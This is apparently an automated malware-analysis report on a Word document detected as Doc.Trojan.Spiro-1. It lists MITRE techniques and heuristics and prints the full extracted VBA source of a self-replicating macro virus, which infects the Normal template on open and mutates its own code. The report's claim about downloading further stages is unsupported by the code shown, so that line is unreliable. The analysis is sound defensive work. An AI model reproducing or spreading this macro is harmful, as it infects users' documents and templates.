Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code within Office documents. The macro attempts to modify the project description to 'WM.Spiroheta' and appears to be designed to download or execute further stages, as indicated by the code that deletes and adds lines to the code module. The ClamAV detection of 'Doc.Trojan.Spiro-1' further supports its malicious nature.
Heuristics 3
- ClamAV: Doc.Trojan.Spiro-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Spiro-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2508 bytes |

SHA-256: 97a9036a74254650ef112ae317753d8a9a7dc1558080b9d983438ca95e5d0867
Detection: ClamAV: Doc.Trojan.Spiro-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Private Sub Document_Open()
On Error Resume Next
'On Error Resume Next
Set vHost = ThisDocument.VBProject.VBComponents(1).CodeModule
'Set v235234 = ThisDocument.VBProject.VBComponents(1).CodeModule
vkod = vHost.Lines(1, vHost.CountOfLines)
'k092345 = v235234.Lines(1, v235234.CountOfLines)
If ThisDocument = ActiveDocument Then Set t759823 = NormalTemplate Else Set t759823 = ActiveDocument
'If ThisDocument = ActiveDocument Then Set h759823 = NormalTemplate Else Set h759823 = ActiveDocument
If t759823.VBProject.VBComponents(1).CodeModule.CountOfLines <> 49 Then
'Set f785109 = h759823.VBProject.VBComponents(1).CodeModule
With t759823.VBProject.VBComponents(1).CodeModule
'If f785109.CountOfLines <> 49 Then
.deletelines 1, .CountOfLines
'With f785109
.addfromstring vkod
'.deletelines 1, .CountOfLines: .addfromstring k092345
End With
'End With
t759823.VBProject.Description = "WM.Spiroheta"
'h759823.VBProject.Description = "WM.Spiroheta": End If
End If
'For t234566 = 1 To ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines Step 2
For a = 2 To ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines Step 2
'n096583 = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(t234566, 1)
naskod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(a, 1)
'If Left(n096583, 1) = "'" Then
If Left(naskod, 1) = "'" Then
'd099874 = Right(n096583, Len(n096583) - 1)
desni = Right(naskod, Len(naskod) - 1)
'ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine t234566, d099874
ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine a, desni
'End If
End If
'd099874 = ""
desni = ""
'Next
Next
'For g650235 = 2 To ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines Step 2
For t = 1 To ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines Step 2
'j719579 = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(g650235, 1)
naskod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(t, 1)
'ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine g650235, "'" & j719579
ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine t, "'" & naskod
'Next
Next
'End Sub
End Sub
```